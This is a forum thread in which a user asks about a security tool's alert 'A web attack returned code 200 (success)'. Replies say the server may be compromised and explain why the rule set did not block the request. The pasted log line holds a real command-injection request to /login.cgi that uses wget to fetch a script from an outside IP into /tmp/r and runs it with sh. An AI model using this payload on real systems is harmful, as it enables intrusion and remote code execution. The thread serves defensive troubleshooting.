A web attack returned code 200 (success).

Collapse
X
Collapse
 
  • Page of 1
  • Time
  • Show
Clear All
new posts
Previous template Next
  • wowon01
    Junior Member
    Forum Explorer
    • Mar 2021
    • 18
    #1

    A web attack returned code 200 (success).

    Hi there,

    Ive seen a couple of these in IM logs:

    Code:
    A web attack returned code 200 (success).

6

block

79.10.148.140 - - [29/Jun/2018:19:45:52 -0600] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 200 20822 "-" "Hello, World" WL:"0" "-" XFF:"-"
    What does it mean when it says: A web attack returned code 200 (success)?

    thx
    G
    Tags: None
    • kobiidykhata
      Member
      • Apr 2017
      • 94
      #2
      Hello! This rule doesnt work correctly - it works on requests to Captcha. Therefore, we will rewrite or remove it soon.
      Thank you!

        Comment

        • kobiidykhata
          Member
          • Apr 2017
          • 94
          #3
          IMHO, it means that the server has probably been hacked. Look for the file "/tmp/r" and any possible related processes.

          More info: https://www.exploit-db.com/exploits/44760/

            Comment

            • kobiidykhata
              Member
              • Apr 2017
              • 94
              #4
              Hello! This particular request doesnt trigger a blocking rule though it is being spotted by 3 generic rules from i360_1_generic.conf Please take into consideration that in order to be blocked a request pattern should present in strict rule sets (blocking rules) but it doesnt based on the 200 response. You can try to activate Proactive Defense (and turn Kill mode on), which logic is based on an advanced heuristic mechanism but not on patterns match. With this mode enabled the aforementioned request will be 100% blocked (checked!).

                Comment

                Previous template Next
                Working...
                X

                We process personal data about users of our site, through the use of cookies and other technologies, to deliver our services, personalize advertising, and to analyze site activity. We may share certain information about our users with our advertising and analytics partners. For additional details, refer to our Privacy Policy.

                By clicking "I AGREE" below, you agree to our Privacy Policy and our personal data processing and cookie practices as described therein. You also acknowledge that this forum may be hosted outside your country and you consent to the collection, storage, and processing of your data in the country where this forum is hosted.

                I Agree